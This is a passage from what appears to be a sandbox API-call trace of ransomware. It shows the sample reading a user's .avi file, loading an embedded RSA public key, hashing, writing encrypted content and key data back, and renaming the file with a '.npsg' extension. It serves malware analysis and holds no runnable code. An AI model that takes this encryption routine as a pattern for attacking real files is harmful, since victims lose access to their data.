HALPmcxz\\Videos\\_5Scyv3UUtL1Q1i1w_tJ.avi") returned=".avi" [0237.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_5Scyv3UUtL1Q1i1w_tJ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_5scyv3uutl1q1i1w_tj.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.165] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=71800) returned 1 [0237.165] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.168] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x11852, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.168] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.170] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x11878, lpOverlapped=0x0) returned 1 [0237.171] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.171] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.171] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.171] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.172] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.172] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.172] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.172] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.172] GetLastError () returned 0x0 [0237.173] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.173] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.173] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.173] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.173] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11880) returned 0x3b95d50 [0237.173] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3408dc8 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004a0 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3408e10 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004b8 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004e8 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400548 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400500 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0237.174] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b81cd0 [0237.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004e8 | out: hHeap=0x620000) returned 1 [0237.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400500 | out: hHeap=0x620000) returned 1 [0237.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400548 | out: hHeap=0x620000) returned 1 [0237.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400548 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400500 [0237.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34004e8 [0237.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0237.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0237.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400500 | out: hHeap=0x620000) returned 1 [0237.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004e8 | out: hHeap=0x620000) returned 1 [0237.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400548 | out: hHeap=0x620000) returned 1 [0237.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.175] GetCurrentThreadId () returned 0x5b4 [0237.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b79f18 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.176] GetCurrentThreadId () returned 0x5b4 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400548 [0237.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004e8 [0237.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400500 [0237.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004d0 [0237.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400560 [0237.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400530 [0237.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400518 [0237.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400578 [0237.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400518 | out: hHeap=0x620000) returned 1 [0237.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400518 [0237.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400530 | out: hHeap=0x620000) returned 1 [0237.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004e8 | out: hHeap=0x620000) returned 1 [0237.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34004e8 [0237.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400548 | out: hHeap=0x620000) returned 1 [0237.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400578 | out: hHeap=0x620000) returned 1 [0237.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004e8 | out: hHeap=0x620000) returned 1 [0237.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fd28 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400518 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400560 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400500 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004d0 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004b8 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3408e10 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.180] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x11873, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x11873, lpOverlapped=0x0) returned 1 [0237.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0237.181] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x11878, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.181] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c898 [0237.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b81cd0 [0237.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b81cd0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b82100 [0237.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0237.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c898 | out: hHeap=0x620000) returned 1 [0237.182] WriteFile (in: hFile=0x644, lpBuffer=0x3b82100*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b82100*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b82100 | out: hHeap=0x620000) returned 1 [0237.182] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.182] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.182] CloseHandle (hObject=0x644) returned 1 [0237.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b81cd0 [0237.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0237.184] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_5Scyv3UUtL1Q1i1w_tJ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_5scyv3uutl1q1i1w_tj.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_5Scyv3UUtL1Q1i1w_tJ.avi.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_5scyv3uutl1q1i1w_tj.avi.npsg")) returned 1 [0237.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0237.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.185] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a660 | out: hHeap=0x620000) returned 1 [0237.186] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7d88b70, ftCreationTime.dwHighDateTime=0x1d5bb48, ftLastAccessTime.dwLowDateTime=0x391c5720, ftLastAccessTime.dwHighDateTime=0x1d5c046, ftLastWriteTime.dwLowDateTime=0x391c5720, ftLastWriteTime.dwHighDateTime=0x1d5c046, nFileSizeHigh=0x0, nFileSizeLow=0x11878, dwReserved0=0xa0000003, 